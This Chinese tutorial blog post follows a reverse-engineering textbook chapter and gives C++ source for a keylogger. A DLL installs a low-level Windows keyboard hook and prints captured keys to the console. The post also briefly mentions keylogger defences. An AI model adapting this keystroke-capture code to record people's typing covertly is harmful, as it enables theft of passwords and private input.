逆向工程核心原理 Chapter22 | 恶意键盘记录器

2024-09-01 23:20

本文主要是介绍逆向工程核心原理 Chapter22 | 恶意键盘记录器,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

教程这一章没给具体的实现,这里在Chapter21学习的基础上,试着实现一个键盘记录器。

键盘记录器实现

这里有个技术问题:记录下的敲击键(在KeyHook.dll中捕获的)(可以用wParam)怎么打印出来(在HookMain.exe中)?

第一种:记录在本地文件。这种实现比较简单。

第二种:与HookMain.exe通信。这种可以学到更多Windows编程知识。

这里实现第二种:

通信实现键盘记录

HookMain.cpp:

#include<iostream>
#include<Windows.h>#define LOAD_DLL "KeyHook.dll"
typedef void(*func)(); // 函数指针
signed main() {HMODULE hDll = NULL;func HookStart = NULL;func HookStop = NULL;char ch = 0;hDll = LoadLibraryA(LOAD_DLL);HookStart = (func)GetProcAddress(hDll, "HookStart");HookStop = (func)GetProcAddress(hDll, "HookStop");HookStart();HookStop();FreeLibrary(hDll);return 0;
}

KeyHook.cpp

要注意使用WH_KEYBOARD_LL

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include<windows.h>
#include<stdio.h>
#include<iostream>
#include<conio.h>
using namespace std;HINSTANCE hInstance = NULL;
HHOOK hHook = NULL;
HWND hWnd = NULL;BOOL APIENTRY DllMain(HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved
)
{switch (ul_reason_for_call){case DLL_PROCESS_ATTACH: // 进程创建时调用hInstance = hModule;break;case DLL_PROCESS_DETACH: // 进程结束时调用break;}return TRUE;
}LRESULT CALLBACK keyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {KBDLLHOOKSTRUCT* ks = (KBDLLHOOKSTRUCT*)lParam;/*typedef struct tagKBDLLHOOKSTRUCT {DWORD   vkCode;   // 按键代号DWORD   scanCode;  //硬件扫描代号DWORD   flags;  //事件类型 按下:0 抬起:128DWORD   time;ULONG_PTR dwExtraInfo;
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;*/if (ks->flags == 128 || ks->flags == 129) {switch (ks->vkCode) {case 0x30: case 0x60:cout << "检测到按键:" << "0" << endl;break;case 0x31: case 0x61:cout << "检测到按键:" << "1" << endl;break;case 0x32: case 0x62:cout << "检测到按键:" << "2" << endl;break;case 0x33: case 0x63:cout << "检测到按键:" << "3" << endl;break;case 0x34: case 0x64:cout << "检测到按键:" << "4" << endl;break;case 0x35: case 0x65:cout << "检测到按键:" << "5" << endl;break;case 0x36: case 0x66:cout << "检测到按键:" << "6" << endl;break;case 0x37: case 0x67:cout << "检测到按键:" << "7" << endl;break;case 0x38: case 0x68:cout << "检测到按键:" << "8" << endl;break;case 0x39: case 0x69:cout << "检测到按键:" << "9" << endl;break;case 0x41:cout << "检测到按键:" << "A" << endl;break;case 0x42:cout << "检测到按键:" << "B" << endl;break;case 0x43:cout << "检测到按键:" << "C" << endl;break;case 0x44:cout << "检测到按键:" << "D" << endl;break;case 0x45:cout << "检测到按键:" << "E" << endl;break;case 0x46:cout << "检测到按键:" << "F" << endl;break;case 0x47:cout << "检测到按键:" << "G" << endl;break;case 0x48:cout << "检测到按键:" << "H" << endl;break;case 0x49:cout << "检测到按键:" << "I" << endl;break;case 0x4A:cout << "检测到按键:" << "J" << endl;break;case 0x4B:cout << "检测到按键:" << "K" << endl;break;case 0x4C:cout << "检测到按键:" << "L" << endl;break;case 0x4D:cout << "检测到按键:" << "M" << endl;break;case 0x4E:cout << "检测到按键:" << "N" << endl;break;case 0x4F:cout << "检测到按键:" << "O" << endl;break;case 0x50:cout << "检测到按键:" << "P" << endl;break;case 0x51:cout << "检测到按键:" << "Q" << endl;break;case 0x52:cout << "检测到按键:" << "R" << endl;break;case 0x53:cout << "检测到按键:" << "S" << endl;break;case 0x54:cout << "检测到按键:" << "T" << endl;break;case 0x55:cout << "检测到按键:" << "U" << endl;break;case 0x56:cout << "检测到按键:" << "V" << endl;break;case 0x57:cout << "检测到按键:" << "W" << endl;break;case 0x58:cout << "检测到按键:" << "X" << endl;break;case 0x59:cout << "检测到按键:" << "Y" << endl;break;case 0x5A:cout << "检测到按键:" << "Z" << endl;break;case 0x6A:cout << "检测到按键:" << "*" << endl;break;case 0x6B:cout << "检测到按键:" << "+" << endl;break;case 0x6D:cout << "检测到按键:" << "-" << endl;break;case 0x6E:cout << "检测到按键:" << "." << endl;break;case 0x6F:cout << "检测到按键:" << "/" << endl;break;case 0x0D:cout << "检测到按键:" << "Enter" << endl;break;case 0xA0: case 0xA1:cout << "检测到按键:" << "Shift" << endl;break;case 0x08:cout << "检测到按键:" << "Backspace" << endl;break;case 0x20:cout << "检测到按键:" << "Space" << endl;break;}// return 1; // 直接return就不传递(也就是拦截下来)}return CallNextHookEx(NULL, nCode, wParam, lParam);
}#ifdef __cplusplus
extern "C" {
#endif__declspec(dllexport) void HookStart() {hHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardProc, hInstance, 0);if (hHook == 0) {cout << "hook failed!\n";}MSG msg;while (1) {if (PeekMessageA(&msg,NULL,NULL,NULL,PM_REMOVE)) {TranslateMessage(&msg);DispatchMessageW(&msg);}else Sleep(0);}}__declspec(dllexport) void HookStop() {if (hHook) {UnhookWindowsHookEx(hHook);hHook = NULL;}}
#ifdef __cplusplus
}
#endif

效果:

在这里插入图片描述

防范恶意键盘记录器

虽然与逆向无关,但是这些还是蛮有必要的。

在这里插入图片描述

总结

多写,多练。Windows编程一定得精通才行。

这篇关于逆向工程核心原理 Chapter22 | 恶意键盘记录器的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1128337

相关文章

Ilya-AI分享的他在OpenAI学习到的15个提示工程技巧

Ilya(不是本人,claude AI)在社交媒体上分享了他在OpenAI学习到的15个Prompt撰写技巧。 以下是详细的内容: 提示精确化:在编写提示时,力求表达清晰准确。清楚地阐述任务需求和概念定义至关重要。例:不用"分析文本",而用"判断这段话的情感倾向:积极、消极还是中性"。 快速迭代:善于快速连续调整提示。熟练的提示工程师能够灵活地进行多轮优化。例:从"总结文章"到"用

深入探索协同过滤:从原理到推荐模块案例

文章目录 前言一、协同过滤1. 基于用户的协同过滤(UserCF)2. 基于物品的协同过滤(ItemCF)3. 相似度计算方法 二、相似度计算方法1. 欧氏距离2. 皮尔逊相关系数3. 杰卡德相似系数4. 余弦相似度 三、推荐模块案例1.基于文章的协同过滤推荐功能2.基于用户的协同过滤推荐功能 前言     在信息过载的时代,推荐系统成为连接用户与内容的桥梁。本文聚焦于

Andrej Karpathy最新采访:认知核心模型10亿参数就够了,AI会打破教育不公的僵局

夕小瑶科技说 原创  作者 | 海野 AI圈子的红人,AI大神Andrej Karpathy,曾是OpenAI联合创始人之一,特斯拉AI总监。上一次的动态是官宣创办一家名为 Eureka Labs 的人工智能+教育公司 ,宣布将长期致力于AI原生教育。 近日,Andrej Karpathy接受了No Priors(投资博客)的采访,与硅谷知名投资人 Sara Guo 和 Elad G

hdu4407(容斥原理)

题意:给一串数字1,2,......n,两个操作:1、修改第k个数字,2、查询区间[l,r]中与n互质的数之和。 解题思路:咱一看,像线段树,但是如果用线段树做,那么每个区间一定要记录所有的素因子,这样会超内存。然后我就做不来了。后来看了题解,原来是用容斥原理来做的。还记得这道题目吗?求区间[1,r]中与p互质的数的个数,如果不会的话就先去做那题吧。现在这题是求区间[l,r]中与n互质的数的和

hdu4407容斥原理

题意: 有一个元素为 1~n 的数列{An},有2种操作(1000次): 1、求某段区间 [a,b] 中与 p 互质的数的和。 2、将数列中某个位置元素的值改变。 import java.io.BufferedInputStream;import java.io.BufferedReader;import java.io.IOException;import java.io.Inpu

hdu4059容斥原理

求1-n中与n互质的数的4次方之和 import java.io.BufferedInputStream;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStream;import java.io.InputStreamReader;import java.io.PrintWrit

PostgreSQL核心功能特性与使用领域及场景分析

PostgreSQL有什么优点? 开源和免费 PostgreSQL是一个开源的数据库管理系统,可以免费使用和修改。这降低了企业的成本,并为开发者提供了一个活跃的社区和丰富的资源。 高度兼容 PostgreSQL支持多种操作系统(如Linux、Windows、macOS等)和编程语言(如C、C++、Java、Python、Ruby等),并提供了多种接口(如JDBC、ODBC、ADO.NET等

Jenkins构建Maven聚合工程,指定构建子模块

一、设置单独编译构建子模块 配置: 1、Root POM指向父pom.xml 2、Goals and options指定构建模块的参数: mvn -pl project1/project1-son -am clean package 单独构建project1-son项目以及它所依赖的其它项目。 说明: mvn clean package -pl 父级模块名/子模块名 -am参数

寻迹模块TCRT5000的应用原理和功能实现(基于STM32)

目录 概述 1 认识TCRT5000 1.1 模块介绍 1.2 电气特性 2 系统应用 2.1 系统架构 2.2 STM32Cube创建工程 3 功能实现 3.1 代码实现 3.2 源代码文件 4 功能测试 4.1 检测黑线状态 4.2 未检测黑线状态 概述 本文主要介绍TCRT5000模块的使用原理,包括该模块的硬件实现方式,电路实现原理,还使用STM32类

Android逆向(反调,脱壳,过ssl证书脚本)

文章目录 总结 基础Android基础工具 定位关键代码页面activity定位数据包参数定位堆栈追踪 编写反调脱壳好用的脚本过ssl证书校验抓包反调的脚本打印堆栈bilibili反调的脚本 总结 暑假做了两个月的Android逆向,记录一下自己学到的东西。对于app渗透有了一些思路。 这两个月主要做的是代码分析,对于分析完后的持久化等没有学习。主要是如何反编译源码,如何找到